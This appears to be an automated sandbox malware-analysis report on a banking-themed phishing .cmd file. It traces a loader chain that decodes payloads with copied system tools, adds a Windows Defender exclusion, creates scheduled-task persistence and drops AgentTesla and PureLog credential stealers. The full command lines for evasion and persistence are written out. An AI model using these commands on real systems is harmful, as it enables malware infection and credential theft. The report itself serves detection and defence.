                    Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 22B008Jump to behavior
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 296008
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1407024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,9_2_00007FF7F1407024
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pifJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: unknown unknown
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: unknown unknown
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14372B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,9_2_00007FF7F14372B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F4E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13F4E88
                    Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF7D15251EC
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF7D1516EE4
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF7D1523140
                    Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,8_2_00007FF7D15251EC
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,8_2_00007FF7D1516EE4
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,8_2_00007FF7D1523140
                    Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,9_2_00007FF7F1453800
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,15_2_02EA5ACC
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,15_2_02EAA7C4
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,15_2_02EA5BD8
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,15_2_02EAA810
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1538654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF7D1538654
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F143130C GetUserNameExW,GetLastError,LocalAlloc,#357,LocalFree,9_2_00007FF7F143130C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D151586C GetVersion,4_2_00007FF7D151586C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1931595213.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.2051386089.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 2724, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2b26216.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3eac190.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.3.Native_neworigin.exe.891c18.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.89ece0.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2b26216.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5180f08.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.2ad6216.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3e55570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5180000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.2ad6216.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.50d0f08.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5a20000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3fdc190.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2b2711e.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5180f08.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.50d0f08.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.3.Native_neworigin.exe.891c18.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.5740000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.2ad711e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3eac190.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.5180000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.3fdc190.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.50d0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3e56478.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3e56478.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.Native_neworigin.exe.2b2711e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.50d0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.5740000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.3e55570.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 47.2.Native_neworigin.exe.2ad711e.1.unpack, type: UNPACKEDPE
